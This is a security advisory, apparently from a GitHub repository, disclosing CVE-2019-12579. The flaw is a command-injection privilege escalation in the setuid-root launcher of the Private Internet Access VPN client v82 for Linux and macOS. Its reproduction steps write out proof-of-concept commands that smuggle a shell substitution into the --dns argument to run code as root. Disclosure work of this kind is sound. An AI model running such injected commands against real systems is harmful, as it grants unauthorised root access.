Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
1 contributor

Users who have contributed to this file

74 lines (47 sloc) 1.92 KB
Title: PIA Linux, macOS Privilege Escalation: Command Injection
Author: Rich Mirch
CVE: CVE-2019-12579
Vendor Advisory: N/A
Description
A vulnerability in the London Trust Media Private Internet Access (PIA)
VPN Client v82 for Linux and macOS could allow an authenticated, local
attacker to run arbitrary code with elevated privileges.
The PIA Linux and macOS openvpn_launcher.64 binary is setuid root. This
binary accepts several parameters to update the system configuration. These
parameters are passed to operating system commands using Here(1) document.
The parameters are not sanitized therefore can be tricked into running
arbitrary commands as root by using shell metacharacters. A local
unprivileged user can pass specially crafted parameters that will be
interpolated by the operating system calls.
References
(1) https://www.tldp.org/LDP/abs/html/here-docs.html
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6
Test Environment
OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82
OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82
Steps to reproduce
All steps are executed as a low privileged user.
Step 1 - Execute openvpn_launcher.64 with the following parameters to execute
the id command as root while redirecting the output to /dev/tty.
##########
# Linux
##########
/opt/pia/openvpn_launcher.64 --dns up a b c'$(/usr/bin/id>/dev/tty)' >/dev/null 2>/dev/null
##########
# macOS
##########
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher \
--dns up a b c'$(/usr/bin/id>/dev/tty)' >/dev/null 2>/dev/null
Timeline:
2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure
You can’t perform that action at this time.